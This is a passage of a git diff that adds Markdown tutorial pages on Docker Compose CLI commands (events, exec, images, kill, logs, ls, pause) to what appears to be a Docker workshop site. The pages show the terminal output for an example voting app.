UTC [50] LOG: database system was shut down at 2023-03-04 14:41:28 UTC +example-voting-app-db-1 | 2023-03-04 14:41:28.351 UTC [1] LOG: database system is ready to accept connections +Error response from daemon: Ports are not available: exposing port TCP 0.0.0.0:5000 -> 0.0.0.0:0: listen tcp 0.0.0.0:5000: bind: address already in use +➜ example-voting-app git:(main) + + + +``` + +#### check docker compose events + + +``` +docker compose events +2023-03-04 20:12:13.002384 container exec_create: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (name=example-voting-app-redis-1, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=a242ce36c4b7595edfe03a0f3f01d71b201f003ab0e04cf04f26ee17e2d5e668, image=redis:alpine, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks) + +2023-03-04 20:12:13.003007 container exec_start: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/Target=/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, execID=a242ce36c4b7595edfe03a0f3f01d71b201f003ab0e04cf04f26ee17e2d5e668, image=redis:alpine, name=example-voting-app-redis-1) + +2023-03-04 20:12:13.022680 container exec_create: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, image=postgres:15-alpine, desktop.docker.io/binds/0/Target=/healthchecks, execID=df7c12ef54c8029a23eb9febcb677c8f8c0984cf5c3da7c5634d268b1b3804b3, name=example-voting-app-db-1) + +2023-03-04 20:12:13.023200 container exec_start: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (name=example-voting-app-db-1, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=df7c12ef54c8029a23eb9febcb677c8f8c0984cf5c3da7c5634d268b1b3804b3, image=postgres:15-alpine, desktop.docker.io/binds/0/Target=/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile) + +2023-03-04 20:12:13.078489 container exec_die c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/Target=/healthchecks, image=redis:alpine, execID=a242ce36c4b7595edfe03a0f3f01d71b201f003ab0e04cf04f26ee17e2d5e668, exitCode=0, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, name=example-voting-app-redis-1) + +2023-03-04 20:12:13.097001 container exec_die 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (image=postgres:15-alpine, desktop.docker.io/binds/0/SourceKind=hostFile, exitCode=0, name=example-voting-app-db-1, desktop.docker.io/binds/0/Target=/healthchecks, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=df7c12ef54c8029a23eb9febcb677c8f8c0984cf5c3da7c5634d268b1b3804b3) + +2023-03-04 20:12:18.082975 container exec_create: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (image=redis:alpine, name=example-voting-app-redis-1, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, execID=4293df2a37da48526e1c21e417c25d34e8947171a66a44bb9741036f09903032) + +2023-03-04 20:12:18.083432 container exec_start: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=4293df2a37da48526e1c21e417c25d34e8947171a66a44bb9741036f09903032, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, image=redis:alpine, name=example-voting-app-redis-1) + +2023-03-04 20:12:18.099740 container exec_create: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (name=example-voting-app-db-1, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, image=postgres:15-alpine, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, execID=725b7d5bf401d7c3944d8432b78835ebd86742b696ce30f6166da8b8d3802f63) + +2023-03-04 20:12:18.100090 container exec_start: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, execID=725b7d5bf401d7c3944d8432b78835ebd86742b696ce30f6166da8b8d3802f63, image=postgres:15-alpine, name=example-voting-app-db-1) + +2023-03-04 20:12:18.169539 container exec_die c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, image=redis:alpine, name=example-voting-app-redis-1, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, execID=4293df2a37da48526e1c21e417c25d34e8947171a66a44bb9741036f09903032, exitCode=0) + +2023-03-04 20:12:18.185722 container exec_die 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/SourceKind=hostFile, image=postgres:15-alpine, desktop.docker.io/binds/0/Target=/healthchecks, exitCode=0, name=example-voting-app-db-1, execID=725b7d5bf401d7c3944d8432b78835ebd86742b696ce30f6166da8b8d3802f63, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks) + +2023-03-04 20:12:23.173394 container exec_create: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/Target=/healthchecks, image=redis:alpine, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, execID=7225d11881403d700013274bbcd9ab8c0dcf8e1ec55ecf8eefc63af51cb10ebe, name=example-voting-app-redis-1) + +2023-03-04 20:12:23.173847 container exec_start: /bin/sh -c /healthchecks/redis.sh c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=7225d11881403d700013274bbcd9ab8c0dcf8e1ec55ecf8eefc63af51cb10ebe, image=redis:alpine, name=example-voting-app-redis-1) + +2023-03-04 20:12:23.188391 container exec_create: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/Target=/healthchecks, name=example-voting-app-db-1, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=8c18f808739a1a14c190db460030da0bb1b4a68a153f202f55a2c840f96bf630, image=postgres:15-alpine) + +2023-03-04 20:12:23.188516 container exec_start: /bin/sh -c /healthchecks/postgres.sh 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, execID=8c18f808739a1a14c190db460030da0bb1b4a68a153f202f55a2c840f96bf630, image=postgres:15-alpine, name=example-voting-app-db-1, desktop.docker.io/binds/0/Target=/healthchecks) + +2023-03-04 20:12:23.241796 container exec_die c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406 (desktop.docker.io/binds/0/SourceKind=hostFile, execID=7225d11881403d700013274bbcd9ab8c0dcf8e1ec55ecf8eefc63af51cb10ebe, exitCode=0, name=example-voting-app-redis-1, desktop.docker.io/binds/0/Target=/healthchecks, image=redis:alpine, desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks) + +2023-03-04 20:12:23.263784 container exec_die 0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6 (desktop.docker.io/binds/0/Source=/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks, desktop.docker.io/binds/0/SourceKind=hostFile, desktop.docker.io/binds/0/Target=/healthchecks, exitCode=0, name=example-voting-app-db-1, execID=8c18f808739a1a14c190db460030da0bb1b4a68a153f202f55a2c840f96bf630, image=postgres:15-alpine) + +``` + +#### use --json flag + +``` + +docker compose events --json +{"action":"exec_create: /bin/sh -c /healthchecks/redis.sh","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"8f907207527e01ca85a0d73227b35a6da73ed8402de4336e1acb312c46e9473e","image":"redis:alpine","name":"example-voting-app-redis-1"},"id":"c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406","service":"redis","time":"2023-03-04T20:30:14.926031584+05:30","type":"container"} +{"action":"exec_start: /bin/sh -c /healthchecks/redis.sh","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"8f907207527e01ca85a0d73227b35a6da73ed8402de4336e1acb312c46e9473e","image":"redis:alpine","name":"example-voting-app-redis-1"},"id":"c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406","service":"redis","time":"2023-03-04T20:30:14.926920001+05:30","type":"container"} +{"action":"exec_create: /bin/sh -c /healthchecks/postgres.sh","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"006d0a097e9819360bf647cc7f2f5c75723588a546b14359267b4b3a0b169310","image":"postgres:15-alpine","name":"example-voting-app-db-1"},"id":"0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6","service":"db","time":"2023-03-04T20:30:14.940481834+05:30","type":"container"} +{"action":"exec_start: /bin/sh -c /healthchecks/postgres.sh","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"006d0a097e9819360bf647cc7f2f5c75723588a546b14359267b4b3a0b169310","image":"postgres:15-alpine","name":"example-voting-app-db-1"},"id":"0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6","service":"db","time":"2023-03-04T20:30:14.941143834+05:30","type":"container"} +{"action":"exec_die","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"8f907207527e01ca85a0d73227b35a6da73ed8402de4336e1acb312c46e9473e","exitCode":"0","image":"redis:alpine","name":"example-voting-app-redis-1"},"id":"c0d6be412752520417ac2b5800fb4501e9c2553f900e078da9fd2a2fde56d406","service":"redis","time":"2023-03-04T20:30:15.009103251+05:30","type":"container"} +{"action":"exec_die","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/healthchecks","desktop.docker.io/binds/0/SourceKind":"hostFile","desktop.docker.io/binds/0/Target":"/healthchecks","execID":"006d0a097e9819360bf647cc7f2f5c75723588a546b14359267b4b3a0b169310","exitCode":"0","image":"postgres:15-alpine","name":"example-voting-app-db-1"},"id":"0ea61e77a190102e4facd7759235fd8c92870b1f594eaaf109a7e55888693dc6","service":"db","time":"2023-03-04T20:30:15.026884834+05:30","type":"container"} +{"action":"exec_create: /bin/sh -c /healthchecks/redis.sh","attributes":{"desktop.docker.io/binds/0/Source":"/Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docke + + +``` \ No newline at end of file diff --git a/content/en/docker/a32.docker-compose-exec 2.md b/content/en/docker/a32.docker-compose-exec 2.md new file mode 100644 index 0000000..74d5fd2 --- /dev/null +++ b/content/en/docker/a32.docker-compose-exec 2.md @@ -0,0 +1,83 @@ +--- +title: "Docker Compose CLI - Exec Command " +description: " Execute a command in a running container. " +slug: "Docker-Compose-CLI-Exec-Command" +--- + +### Docker Compose Exec into result service + + +```sh + +docker compose exec result sh +# ls +Dockerfile docker-compose.test.yml package-lock.json package.json server.js tests views +# cat docker-compose.test.yml +version: '2' + +services: + + sut: + build: ./tests/ + depends_on: + - vote + - result + - worker + networks: + - front-tier + + vote: + build: ../vote/ + ports: ["80"] + depends_on: + - redis + - db + networks: + - front-tier + - back-tier + + result: + build: . + ports: ["80"] + depends_on: + - redis + - db + networks: + - front-tier + - back-tier + + worker: + build: ../worker/ + depends_on: + - redis + - db + networks: + - back-tier + + redis: + image: redis:alpine + networks: + - back-tier + + db: + image: postgres:9.4 + environment: + POSTGRES_USER: "postgres" + POSTGRES_PASSWORD: "postgres" + volumes: + - "db-data:/var/lib/postgresql/data" + networks: + - back-tier + +volumes: + db-data: + +networks: + front-tier: + back-tier: +# exit +➜ example-voting-app git:(main) + + +``` + diff --git a/content/en/docker/a33.docker-compose-images 2.md b/content/en/docker/a33.docker-compose-images 2.md new file mode 100644 index 0000000..f51ec79 --- /dev/null +++ b/content/en/docker/a33.docker-compose-images 2.md @@ -0,0 +1,18 @@ +--- +title: "Docker Compose CLI - Images Command " +description: " List images used by the created containers " +slug: "Docker-Compose-CLI-Images-Command" +--- + +```sh +example-voting-app git:(main) docker compose images +CONTAINER REPOSITORY TAG IMAGE ID SIZE +example-voting-app-db-1 postgres 15-alpine 68d4a8d9d3d9 241MB +example-voting-app-redis-1 redis alpine 1339d05b97a4 30.4MB +example-voting-app-result-1 example-voting-app-result latest 223b94fc00ae 254MB +example-voting-app-vote-1 example-voting-app-vote latest 5c1cf62b540c 135MB +example-voting-app-worker-1 example-voting-app-worker latest 8f82fda1dae8 195MB + +``` + + diff --git a/content/en/docker/a34.docker-compose-kill 2.md b/content/en/docker/a34.docker-compose-kill 2.md new file mode 100644 index 0000000..443e16f --- /dev/null +++ b/content/en/docker/a34.docker-compose-kill 2.md @@ -0,0 +1,18 @@ +--- +title: "Docker Compose CLI - Kill Command " +description: " Force stop service containers. " +slug: "Docker-Compose-CLI-Kill-Command" +--- + + + +#### Forces running containers to stop by sending a SIGKILL signal. Optionally the signal can be passed : + +```sh + example-voting-app git:(main) docker-compose kill -s SIGINT +[+] Running 4/0 + β Ώ Container example-voting-app-redis-1 Killed 0.0s + β Ώ Container example-voting-app-worker-1 Killed 0.0s + β Ώ Container example-voting-app-db-1 Killed 0.0s + β Ώ Container example-voting-app-result-1 Killed 0.0s +``` \ No newline at end of file diff --git a/content/en/docker/a35.docker-compose-logs 2.md b/content/en/docker/a35.docker-compose-logs 2.md new file mode 100644 index 0000000..c9ebb3e --- /dev/null +++ b/content/en/docker/a35.docker-compose-logs 2.md @@ -0,0 +1,132 @@ +--- +title: "Docker Compose CLI - logs Command " +description: " View output from containers " +slug: "Docker-Compose-CLI-Logs-Command" +--- + + + +#### View output from containers + + +```sh + +➜ example-voting-app git:(main) docker-compose logs +example-voting-app-worker-1 | Connected to db +example-voting-app-result-1 | [nodemon] 2.0.21 +example-voting-app-worker-1 | Found redis at 172.20.0.2 +example-voting-app-worker-1 | Connecting to redis +example-voting-app-result-1 | [nodemon] to restart at any time, enter `rs` +example-voting-app-result-1 | [nodemon] watching path(s): *.* +example-voting-app-result-1 | [nodemon] watching extensions: js,mjs,json +example-voting-app-result-1 | [nodemon] starting `node server.js` +example-voting-app-result-1 | Sat, 04 Mar 2023 18:00:16 GMT body-parser deprecated bodyParser: use individual json/urlencoded middlewares at server.js:73:9 +example-voting-app-result-1 | Sat, 04 Mar 2023 18:00:16 GMT body-parser deprecated undefined extended: provide extended option at ../node_modules/body-parser/index.js:104:29 +example-voting-app-result-1 | App running on port 80 +example-voting-app-result-1 | Connected to db +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.311 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.313 # Redis version=7.0.9, bits=64, commit=00000000, modified=0, pid=1, just started +example-voting-app-redis-1 | 1:C 04 Mar 2023 14:41:27.313 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.313 * monotonic clock: POSIX clock_gettime +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.314 * Running mode=standalone, port=6379. +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.315 # Server initialized +example-voting-app-redis-1 | 1:M 04 Mar 2023 14:41:27.318 * Ready to accept connections +example-voting-app-redis-1 | 1:signal-handler (1677952603) Received SIGINT scheduling shutdown... +example-voting-app-redis-1 | 1:M 04 Mar 2023 17:56:43.159 # User requested shutdown... +example-voting-app-redis-1 | 1:M 04 Mar 2023 17:56:43.159 * Saving the final RDB snapshot before exiting. +example-voting-app-redis-1 | 1:M 04 Mar 2023 17:56:43.161 * DB saved on disk +example-voting-app-redis-1 | 1:M 04 Mar 2023 17:56:43.161 # Redis is now ready to exit, bye bye... +example-voting-app-redis-1 | 1:C 04 Mar 2023 18:00:10.915 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo +example-voting-app-redis-1 | 1:C 04 Mar 2023 18:00:10.915 # Redis version=7.0.9, bits=64, commit=00000000, modified=0, pid=1, just started +example-voting-app-redis-1 | 1:C 04 Mar 2023 18:00:10.915 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.915 * monotonic clock: POSIX clock_gettime +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.916 * Running mode=standalone, port=6379. +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.916 # Server initialized +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * Loading RDB produced by version 7.0.9 +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * RDB age 207 seconds +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * RDB memory usage when created 1.09 Mb +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * Done loading RDB, keys loaded: 0, keys expired: 0. +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * DB loaded from disk: 0.000 seconds +example-voting-app-redis-1 | 1:M 04 Mar 2023 18:00:10.918 * Ready to accept connections +example-voting-app-db-1 | The files belonging to this database system will be owned by user "postgres". +example-voting-app-db-1 | This user must also own the server process. +example-voting-app-db-1 | +example-voting-app-db-1 | The database cluster will be initialized with locale "en_US.utf8". +example-voting-app-db-1 | The default database encoding has accordingly been set to "UTF8". +example-voting-app-db-1 | The default text search configuration will be set to "english". +example-voting-app-db-1 | +example-voting-app-db-1 | Data page checksums are disabled. +example-voting-app-db-1 | +example-voting-app-db-1 | fixing permissions on existing directory /var/lib/postgresql/data ... ok +example-voting-app-db-1 | creating subdirectories ... ok +example-voting-app-db-1 | selecting dynamic shared memory implementation ... posix +example-voting-app-db-1 | selecting default max_connections ... 100 +example-voting-app-db-1 | selecting default shared_buffers ... 128MB +example-voting-app-db-1 | selecting default time zone ... UTC +example-voting-app-db-1 | creating configuration files ... ok +example-voting-app-db-1 | running bootstrap script ... ok +example-voting-app-db-1 | sh: locale: not found +example-voting-app-db-1 | 2023-03-04 14:41:27.703 UTC [30] WARNING: no usable system locales were found +example-voting-app-db-1 | performing post-bootstrap initialization ... ok +example-voting-app-db-1 | syncing data to disk ... ok +example-voting-app-db-1 | +example-voting-app-db-1 | +example-voting-app-db-1 | Success. You can now start the database server using: +example-voting-app-db-1 | +example-voting-app-db-1 | pg_ctl -D /var/lib/postgresql/data -l logfile start +example-voting-app-db-1 | +example-voting-app-db-1 | initdb: warning: enabling "trust" authentication for local connections +example-voting-app-db-1 | initdb: hint: You can change this by editing pg_hba.conf or using the option -A, or --auth-local and --auth-host, the next time you run initdb. +example-voting-app-db-1 | waiting for server to start....2023-03-04 14:41:28.118 UTC [36] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +example-voting-app-db-1 | 2023-03-04 14:41:28.120 UTC [36] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +example-voting-app-db-1 | 2023-03-04 14:41:28.124 UTC [39] LOG: database system was shut down at 2023-03-04 14:41:28 UTC +example-voting-app-db-1 | 2023-03-04 14:41:28.127 UTC [36] LOG: database system is ready to accept connections +example-voting-app-db-1 | done +example-voting-app-db-1 | server started +example-voting-app-db-1 | +example-voting-app-db-1 | /usr/local/bin/docker-entrypoint.sh: ignoring /docker-entrypoint-initdb.d/* +example-voting-app-db-1 | +example-voting-app-db-1 | waiting for server to shut down....2023-03-04 14:41:28.218 UTC [36] LOG: received fast shutdown request +example-voting-app-db-1 | 2023-03-04 14:41:28.220 UTC [36] LOG: aborting any active transactions +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [36] LOG: background worker "logical replication launcher" (PID 42) exited with exit code 1 +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [37] LOG: shutting down +example-voting-app-db-1 | 2023-03-04 14:41:28.222 UTC [37] LOG: checkpoint starting: shutdown immediate +example-voting-app-db-1 | 2023-03-04 14:41:28.227 UTC [37] LOG: checkpoint complete: wrote 3 buffers (0.0%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.002 s, sync=0.001 s, total=0.005 s; sync files=2, longest=0.001 s, average=0.001 s; distance=0 kB, estimate=0 kB +example-voting-app-db-1 | 2023-03-04 14:41:28.233 UTC [36] LOG: database system is shut down +example-voting-app-db-1 | done +example-voting-app-db-1 | server stopped +example-voting-app-db-1 | +example-voting-app-db-1 | PostgreSQL init process complete; ready for start up. +example-voting-app-db-1 | +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: listening on IPv4 address "0.0.0.0", port 5432 +example-voting-app-db-1 | 2023-03-04 14:41:28.342 UTC [1] LOG: listening on IPv6 address "::", port 5432 +example-voting-app-db-1 | 2023-03-04 14:41:28.344 UTC [1] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +example-voting-app-db-1 | 2023-03-04 14:41:28.347 UTC [50] LOG: database system was shut down at 2023-03-04 14:41:28 UTC +example-voting-app-db-1 | 2023-03-04 14:41:28.351 UTC [1] LOG: database system is ready to accept connections +example-voting-app-db-1 | 2023-03-04 14:46:28.434 UTC [48] LOG: checkpoint starting: time +example-voting-app-db-1 | 2023-03-04 14:46:36.189 UTC [48] LOG: checkpoint complete: wrote 79 buffers (0.5%); 0 WAL file(s) added, 0 removed, 0 recycled; write=7.707 s, sync=0.027 s, total=7.755 s; sync files=41, longest=0.012 s, average=0.001 s; distance=397 kB, estimate=397 kB +example-voting-app-db-1 | 2023-03-04 17:56:43.105 UTC [1] LOG: received fast shutdown request +example-voting-app-db-1 | 2023-03-04 17:56:43.107 UTC [1] LOG: aborting any active transactions +example-voting-app-db-1 | 2023-03-04 17:56:43.111 UTC [67] FATAL: terminating connection due to administrator command +example-voting-app-db-1 | 2023-03-04 17:56:43.117 UTC [66] FATAL: terminating connection due to administrator command +example-voting-app-db-1 | 2023-03-04 17:56:43.122 UTC [1] LOG: background worker "logical replication launcher" (PID 53) exited with exit code 1 +example-voting-app-db-1 | 2023-03-04 17:56:43.126 UTC [48] LOG: shutting down +example-voting-app-db-1 | 2023-03-04 17:56:43.128 UTC [48] LOG: checkpoint starting: shutdown immediate +example-voting-app-db-1 | 2023-03-04 17:56:43.138 UTC [48] LOG: checkpoint complete: wrote 0 buffers (0.0%); 0 WAL file(s) added, 0 removed, 0 recycled; write=0.003 s, sync=0.001 s, total=0.012 s; sync files=0, longest=0.000 s, average=0.000 s; distance=0 kB, estimate=357 kB +example-voting-app-db-1 | 2023-03-04 17:56:43.185 UTC [1] LOG: database system is shut down +example-voting-app-db-1 | +example-voting-app-db-1 | PostgreSQL Database directory appears to contain a database; Skipping initialization +example-voting-app-db-1 | +example-voting-app-db-1 | 2023-03-04 18:00:10.972 UTC [1] LOG: starting PostgreSQL 15.2 on aarch64-unknown-linux-musl, compiled by gcc (Alpine 12.2.1_git20220924-r4) 12.2.1 20220924, 64-bit +example-voting-app-db-1 | 2023-03-04 18:00:10.972 UTC [1] LOG: listening on IPv4 address "0.0.0.0", port 5432 +example-voting-app-db-1 | 2023-03-04 18:00:10.972 UTC [1] LOG: listening on IPv6 address "::", port 5432 +example-voting-app-db-1 | 2023-03-04 18:00:10.973 UTC [1] LOG: listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432" +example-voting-app-db-1 | 2023-03-04 18:00:10.977 UTC [24] LOG: database system was shut down at 2023-03-04 17:56:43 UTC +example-voting-app-db-1 | 2023-03-04 18:00:10.982 UTC [1] LOG: database system is ready to accept connections +➜ example-voting-app git:(main) + + + + +``` \ No newline at end of file diff --git a/content/en/docker/a36.docker-compose-ls 2.md b/content/en/docker/a36.docker-compose-ls 2.md new file mode 100644 index 0000000..c1b9bd8 --- /dev/null +++ b/content/en/docker/a36.docker-compose-ls 2.md @@ -0,0 +1,17 @@ +--- +title: "Docker Compose CLI - ls Command" +description: " List running compose projects " +slug: "Docker-Compose-CLI-ls-Command" +--- + + + +#### List running compose projects + + +```sh +docker-compose ls +NAME STATUS CONFIG FILES +example-voting-app running(4) /Users/sangambiradar/Documents/GitHub/dockerworkshop/workshop/Docker102/Docker-Compose/example-voting-app/docker-compose.yml +➜ example-voting-app git:(main) +``` \ No newline at end of file diff --git a/content/en/docker/a37.docker-compose-pause 2.md b/content/en/docker/a37.docker-compose-pause 2.md new file mode 100644 index 0000000..cd2e4e9 --- /dev/null +++ b/content/en/docker/a37.docker-compose-pause 2.md @@ -0,0 +1,31 @@ +--- +title: "Docker Compose CLI - Pause unpause Command " +description: " Pause services " +slug: "Docker-Compose-CLI-Pause-unpause-Command" +--- + +```sh + example-voting-app git:(main) docker compose pause +[+] Running 4/0 + β Ώ Container example-voting-app-db-1 Paused 0.0s + β Ώ Container example-voting-app-redis-1 Paused 0.0s + β Ώ Container example-voting-app-worker-1 Paused 0.0s + β Ώ Container example-voting-app-result-1 Paused 0.0s +➜ example-voting-app git:(main) +``` + + +#### Pauses running containers of a service. They can be unpaused with docker compose unpause. + +```sh +docker compose unpause +[+] Running 4/0 + β Ώ Container example-voting-app-worker-1 Unpaused 0.0s + β Ώ Container example-voting-app-redis-1 Unpaused 0.0s + β Ώ Container example-voting-app-result-1 Unpaused 0.0s + β Ώ Container example-voting-app-db-1 Unpaused 0.0s +➜ example-voting-app git:(main) + +``` + + diff --git a/content/en/docker/a38.docker-compose-port 2.md b/content/en/docker/a38.docker-compose-port 2.md new file mode 100644 index 0000000..5500f73 --- /dev/null +++ b/content/en/docker/a38.docker-compose-port 2.md @@ -0,0 +1,16 @@ +--- +title: "Docker Compose CLI - Port Command " +description: " Print the public port for a port binding." +slug: 